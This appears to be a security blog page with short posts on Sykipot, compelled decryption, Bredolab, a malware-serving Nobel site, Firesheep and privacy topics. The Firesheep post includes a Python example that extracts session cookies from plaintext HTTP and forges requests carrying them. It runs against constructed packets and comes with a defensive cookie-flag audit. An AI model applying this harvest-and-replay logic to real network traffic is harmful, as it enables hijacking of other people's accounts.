Hack The Planet

Because if you don't, who will?

Tuesday, January 24, 2012

Sykipot trojan steals US Military ID card data

A bit of old news: the Sykipot trojan has been modified by Chinese hackers to steal sensitive information off DoD networks by capturing what is needed to use a DoD smart card. The cards hold a certificate and private key and are unlocked with a PIN, which is what makes them a stronger login to DoD networks than a password. This Sykipot variant adds a keylogger to capture the PIN; with the PIN and a card sitting in the reader, the malware can authenticate with the card's certificate to reach protected networks. Since the private key never leaves the card, the attacker can only do this while the card is inserted, which is a good argument for pulling the card as soon as you are done with it. The hackers used a spearphishing campaign to deliver the trojan.

posted by holliday at 5:40 pm  

Monday, January 23, 2012

Full disk encryption may not save you from the law

A Colorado woman has been ordered by a judge to decrypt her laptop so that prosecutors can use the files on it against her. Judge Robert Blackburn said “I conclude that the Fifth Amendment is not implicated by requiring production of the unencrypted contents of the Toshiba Satellite M305 laptop computer.”

Apparently the fact that there was a jailhouse recording of the defendant, Ramona Fricosu, led the judge to believe there was evidence that the information the prosecution was looking for was on the laptop. I understand that Assistant U.S. Attorney Patricia Davies says that if the judge did not force her to give up her password, the terrorists would win. She didn’t actually say that. She said, “a concession to her and potential criminals (be it in child exploitation, national security, terrorism, financial crimes or drug trafficking cases) that encrypting all inculpatory digital evidence will serve to defeat the efforts of law enforcement officers to obtain such evidence through judicially authorized search warrants, and thus make their prosecution impossible.”

I just think that it is a leap to say that if the judge does not require Fricosu to give up her password, all of the bad people would immediately encrypt all of their information and that it would thwart our ability to prosecute them. Would it make it more difficult in some cases? Sure. But that is why it is the prosecution’s job to have enough evidence to convict and not the defendant’s job to hand over any proof of wrongdoing.

This is what the 5th Amendment was geared for, and the judge is making a huge mistake. A mistake that favors the prosecution and government. How strange.

I would still encrypt your drives. Most OSes now make it easy, and if you don’t want to use the built-in tools you can always use TrueCrypt.

posted by holliday at 11:34 pm  

Tuesday, January 17, 2012

Cyberwar in the Middle East or Cyberslap-fight?

Hackers who claim to be from Israel and Saudi Arabia have been taking swings at the stock exchanges and financial hubs of each other’s countries. In the most recent hack, pro-Israel hackers took the stock exchanges of Saudi Arabia and the UAE offline for hours. The cyberattacks continue to escalate, and it will be interesting to see where this ends, whether in more severe hacks or more tit for tat.

posted by holliday at 2:06 pm  

Tuesday, August 23, 2011

McAfee reacts to industry questioning

Well, it was only a matter of time, but after members of the security community questioned McAfee’s reaction to Operation Shady RAT (what marketing person came up with that?), McAfee has responded.

I find it interesting that after sitting on the information until the Black Hat USA conference to get as much marketing splash as possible, they were shocked when the industry didn’t find the attack that surprising or new. It was a persistent attack by an organized group, possibly a nation-state, that utilized a botnet (Yes, McAfee, Kaminsky was right in calling it a botnet).

There was nothing new in the report, and that is why the industry responded. Calling everything an APT may make national news, but it doesn’t make the attack new or different. If you want industry collaboration, then don’t make it all about the marketing; make it about the information.

posted by holliday at 7:15 am  

Friday, July 15, 2011

Anonymity in a connected world

In a recent Network World article, author Dave Kearns postulated that in the connected world we live in, anonymity is viewed as odd and even suspicious. He uses an example of a girl who is trying to look up information on a possible suitor and can’t find anything. She views his lack of an online presence as a possible reason not to see him, even though in the physical world he seems quite the catch.

I find this very funny on two fronts. First, in our new, fully connected world we have lost our ability to connect without the use of technology. Second, good internet habits are looked at as a negative, because not having your private life splashed all over the digital tabloids that are Facebook, MySpace and other sites is not acceptable.

It reminds me of Orwell’s 1984 and some of the commentary that has come from it. Basically, if you have nothing to hide, then why aren’t you allowing strangers to view your every move? It is the same reasoning by which the government has instituted draconian laws allowing it to listen in on all of our citizens’ phone calls and read all of their email, because, again, why worry if you have nothing to hide?

It is a brave new world, but not necessarily a better one.

posted by holliday at 5:35 am  

Tuesday, December 21, 2010

God save the Queen

A bill abolishing the National Identity Scheme is expected to be passed into law on December 21st after receiving royal assent. Home office minister Damien Green wrote “Photographs, fingerprints and personal information that were submitted as part of the application process for an ID card will be destroyed within two months.”

It is nice to see a country moving to return some sanity and civil liberties to its citizens instead of continuing to turn into a police state.

posted by holliday at 11:51 am  

Wednesday, November 3, 2010

Learning from your mistakes

There is an interview with Marissa Mayer, a VP at Google, where the question was asked, “What have been Google’s biggest mistakes?” She answered that Wave, shutting down Dejanews and launching Gmail on April 1st (April Fools’ Day) were the top three. I don’t want to focus on these though (shutting down Wave breaks my heart because it was great). I want to focus on what Google does really well. It learns from its mistakes and moves on quickly.

In my career I have worked at many start-ups, and some of them have been acquired by large companies which retained me after the takeover. When those companies took over, you could actually feel the innovation and momentum just slow to a crawl. In a start-up you have to be fast, willing to change direction quickly and follow your instincts. If you don’t, you fail. In larger organizations, though, it seems like it is frowned upon to challenge the status quo, to innovate or to create.

What Google does is different though (I don’t work there, never have and don’t know anyone who does or has, so this is an outside assumption). They build and test new ideas, and if they fail to meet their standards they move on. But what they give you is some amazing functionality and great new ideas: Gmail, Google Earth, Wave (even though they are canceling it), Street View and Android. Any of these could have been done by another company, but Google actually did them. They stepped up and tried it. Some of their ideas have failed, and some have cost them millions and millions of dollars, but they continue to look for new ways to innovate and grow their business.

They aren’t afraid to fail, and they even encourage it. Not that they want to fail or want their projects to fail, but they actively learn from them and keep going out on a limb with new products and features. You can’t succeed if you don’t fail.

As Thomas Edison said “I have not failed. I’ve just found 10,000 ways that won’t work.” Don’t be afraid to fail. Be afraid of doing nothing.

posted by holliday at 9:33 am  

Monday, November 1, 2010

Firesheep – Because the name Firecow was taken

There are tons of posts on the new Firefox extension, Firesheep. Firesheep is an extension that lets you hijack other users’ social network sessions when they are on the same wired or wireless network as you. Eric Butler, one of the co-authors, has a post explaining how Firesheep works.

The basics of the attack are that websites like Facebook use “cookies” to recognize a user who has already logged in, so the site does not have to ask for the password again until the cookie expires. The browser sends that session cookie with every request to the site. The issue is that while the sites often encrypt the initial login, they frequently serve everything after it over plain HTTP, so anyone on the same network segment (an open WiFi hotspot being the classic case) can sniff the cookie out of the traffic and replay it in their own requests. No password is needed: to the site, whoever presents the cookie is the logged-in user, which is exactly what Firesheep automates.

To protect yourself from this type of attack you should always maintain an encrypted session with any of your social network sites. Some folks say not to connect to these sites at all on public WiFi, but in general you are better off treating every network as untrusted or hostile and just encrypting your network traffic. You can use the Force-TLS or HTTPS-Everywhere extensions, though they can only force HTTPS on sites that actually serve their pages over it, so they may not work everywhere. The durable fix is on the server side: serve the whole session over HTTPS and set the Secure flag on the session cookie so the browser will never send it over HTTP in the first place.

The slides for Firesheep from Toorcon are here.
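To make the mechanics concrete, here is an added example that is not Firesheep’s code and is not from the original post: a stripped-down version of the sniff-and-replay attack next to the server-side cookie check that defeats it. The site names, cookie names and captured packets are all constructed for the example; HANDLERS stands in for the per-site handler list that the real add-on ships with.

```python
"""Firesheep-style session hijacking, reduced to its essentials, plus the
Set-Cookie audit that stops it. Added example, not Firesheep's code. All
hosts, cookie names and traffic below are constructed for illustration."""
from dataclasses import dataclass

# Hypothetical handler table: host -> cookie names that identify a session.
HANDLERS = {
    "www.example-social.test": ["sessionid", "csrftoken"],
    "mail.example.test": ["SID"],
}

# Constructed captures as (source IP, destination port, TCP payload). Only the
# plaintext HTTP on port 80 is readable; the TLS record on 443 is opaque.
SAMPLE_PACKETS = [
    ("10.0.0.5", 443, b"\x16\x03\x01\x00\x4a\x01\x00\x00\x46\x03\x03"),  # TLS
    ("10.0.0.5", 80,
     b"GET /feed HTTP/1.1\r\nHost: www.example-social.test\r\n"
     b"Cookie: sessionid=9f8e7d6c; csrftoken=ab12; lang=en\r\n\r\n"),
    ("10.0.0.7", 80,
     b"GET / HTTP/1.1\r\nHost: news.example.test\r\nCookie: theme=dark\r\n\r\n"),
    ("10.0.0.9", 80, b"\x00\x01garbage that is not HTTP"),
]


@dataclass
class Capture:
    src_ip: str
    host: str
    cookies: dict


def parse_http_request(raw: bytes):
    """Return the headers of a plaintext HTTP request, or None if it isn't one."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    lines = head.split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_cookie_header(value: str) -> dict:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def harvest(packets):
    """Sniffing half: pull session cookies for known sites out of plaintext HTTP."""
    captures = []
    for src_ip, dst_port, payload in packets:
        if dst_port != 80:  # 443 is encrypted; nothing to read there
            continue
        headers = parse_http_request(payload)
        if headers is None:
            continue
        host = headers.get("host", "").split(":")[0].lower()
        wanted = HANDLERS.get(host)
        if not wanted:
            continue
        jar = parse_cookie_header(headers.get("cookie", ""))
        session = {name: jar[name] for name in wanted if name in jar}
        if session:
            captures.append(Capture(src_ip, host, session))
    return captures


def forge_request(capture: Capture, path: str = "/") -> bytes:
    """Replay half: the attacker's own request carrying the victim's cookies.
    No password involved; to the site the cookie *is* the login."""
    cookie = "; ".join(f"{k}={v}" for k, v in capture.cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {capture.host}\r\n"
            f"Cookie: {cookie}\r\n\r\n").encode()


def audit_set_cookie(set_cookie: str) -> list:
    """Server side: flag a Set-Cookie whose attributes let the browser send the
    session cookie over plain HTTP, or expose it to injected script."""
    attrs = {p.strip().lower().split("=")[0] for p in set_cookie.split(";")[1:]}
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure: browser will send it over http://")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: readable by injected script")
    return problems


if __name__ == "__main__":
    for cap in harvest(SAMPLE_PACKETS):
        print(f"{cap.src_ip} -> {cap.host}: {cap.cookies}")
        print(forge_request(cap, "/feed").decode())
    print(audit_set_cookie("sessionid=9f8e7d6c; Path=/"))
    print(audit_set_cookie("sessionid=9f8e7d6c; Path=/; Secure; HttpOnly"))
```

Run it and the only capture comes from the one plaintext request to a handled site; the encrypted login on 443 and the unrelated site yield nothing. That is the whole lesson of Firesheep in miniature: HTTPS-Everywhere on the client keeps your requests off port 80, and a Secure flag on the server’s session cookie means the browser will not leak it even if the user lands on an http:// link.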

posted by holliday at 3:17 pm  

Friday, October 29, 2010

Nobel Peace Prize website delivering malware

A Firefox 0-day vulnerability is being used to serve malware from the official website for the Nobel Peace Prize. Norman ASA detection executive Einar Oftedal stated in an instant message to the Register, “This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11, we didn’t see any 0day for IE.” The malware does not target Windows Vista or 7 systems, limiting the attack to Windows XP users running Firefox 3.6.11 or earlier.

Mozilla is aware of the vulnerability and is working on a fix that will most likely be out later this week once it has been tested. The exploit is most likely not limited to the Nobel Peace Prize website, since the same iframe could be planted on any compromised page. Until the patch ships, Firefox users can protect themselves by using NoScript or disabling JavaScript in their browser, which blocks the injected iframe’s exploit code from running.

Some theorize the attack is related to the Nobel Peace Prize being awarded to Liu Xiaobo this year, who is incarcerated in China for his participation in Charter 08.

posted by holliday at 11:51 am  

Friday, October 29, 2010

Bredolab botnet neutered, not dead yet

Dutch authorities, in conjunction with network security organizations, have taken control of and started dismantling 143 command and control servers used by the Bredolab botnet. The Bredolab botnet had infected an estimated 30 million computers during its time and was reportedly used in a phishing scam last year against Facebook users.

A 27-year-old suspect was arrested a little while later after trying to regain control of the botnet and then trying to use it to DDoS the web hosting firm Leaseweb, whose servers the botnet had been using.

While the majority of the C&C servers have been taken offline, there are still some alive and kicking.

One of the more interesting pieces to me is that the Fox-IT team working with the Dutch authorities is using the seized infrastructure to notify users of infected machines, when they next log on, that they are infected and how to remedy it. As of this posting, over 100,000 users have been notified.

posted by holliday at 11:08 am  